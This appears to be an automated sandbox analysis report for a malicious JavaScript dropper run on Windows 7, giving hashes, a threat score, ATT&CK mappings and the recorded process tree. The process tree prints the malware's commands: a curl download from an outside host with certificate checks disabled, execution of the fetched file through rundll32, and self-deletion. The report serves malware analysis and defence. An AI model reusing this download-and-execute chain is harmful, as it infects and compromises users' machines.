fd6bab35a50fe31eaa9c8ab86e61786c79a7b23dd447610ba1a9617e8267acbd

Analysis

max time kernel
121s
max time network
123s
platform
windows7_x64
resource
win7-20230712-en
resource tags

arch:x64arch:x86image:win7-20230712-enlocale:en-usos:windows7-x64system
submitted
22/08/2023, 19:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Document_08_22_83358.js
Size

32KB
MD5

b94169d7fcf7fb3ce08fa95e4676da37
SHA1

f389244207b1f9804ea386586413c3fb84cb4e21
SHA256

fd6bab35a50fe31eaa9c8ab86e61786c79a7b23dd447610ba1a9617e8267acbd
SHA512

cbb56626ffe274fb4a1df0ead028800201b1910279f9581bd0503db7f42ed85b8b9006961d2f8ed01ea2d847097625f123d1244cea236204ecf28064a7208540
SSDEEP

384:0gjih/zrnbNun0FJBEZyyZHVjv2AgpZyJpszYWk7Pqo5Vze4Cll6aogReLyxcB19:BiAs2ck2UskWe75AVdMt+kj68VrrAhwt

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
2428	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 3012 wrote to memory of 2428	3012	wscript.exe	28
PID 3012 wrote to memory of 2428	3012	wscript.exe	28
PID 3012 wrote to memory of 2428	3012	wscript.exe	28
PID 3012 wrote to memory of 2436	3012	wscript.exe	30
PID 3012 wrote to memory of 2436	3012	wscript.exe	30
PID 3012 wrote to memory of 2436	3012	wscript.exe	30
PID 3012 wrote to memory of 2492	3012	wscript.exe	32
PID 3012 wrote to memory of 2492	3012	wscript.exe	32
PID 3012 wrote to memory of 2492	3012	wscript.exe	32
PID 3012 wrote to memory of 1748	3012	wscript.exe	34
PID 3012 wrote to memory of 1748	3012	wscript.exe	34
PID 3012 wrote to memory of 1748	3012	wscript.exe	34
PID 3012 wrote to memory of 2920	3012	wscript.exe	36
PID 3012 wrote to memory of 2920	3012	wscript.exe	36
PID 3012 wrote to memory of 2920	3012	wscript.exe	36
PID 3012 wrote to memory of 2932	3012	wscript.exe	37
PID 3012 wrote to memory of 2932	3012	wscript.exe	37
PID 3012 wrote to memory of 2932	3012	wscript.exe	37

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Document_08_22_83358.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\Document_08_22_83358.js"
  2⤵
  - Deletes itself
  PID:2428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c echo curl https://panda.az/out/k.php --output "C:\Users\Admin\AppData\Local\Temp\deserunt.vinventore.v" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat"
  2⤵
  PID:2436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat"
  2⤵
  PID:2492
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\deserunt.vinventore.v" "deserunt.v"
  2⤵
  PID:1748
- C:\Windows\System32\rundll32.exe
  "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\deserunt.v", vcab /k nutela746
  2⤵
  PID:2920
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat"
  2⤵
  PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\deserunt.v.bat

Filesize
139B

MD5
22096f7169216dd60d6e2b756e0e9660

SHA1
3baee5e37214fbbca6f079f7481db5708aa24e34

SHA256
5ddc1d081936c1af80eb7c3bd0054283b8817bbdc6c10dc01b2faaa32f97149d

SHA512
c67031fde049063f51e1764785552f147398881f18980767bbb5132bc29e5775d97064adf36b015c61a18437c9a7f5b1d7e15dbec7218cb8d3690bdf23654b46

Download Submit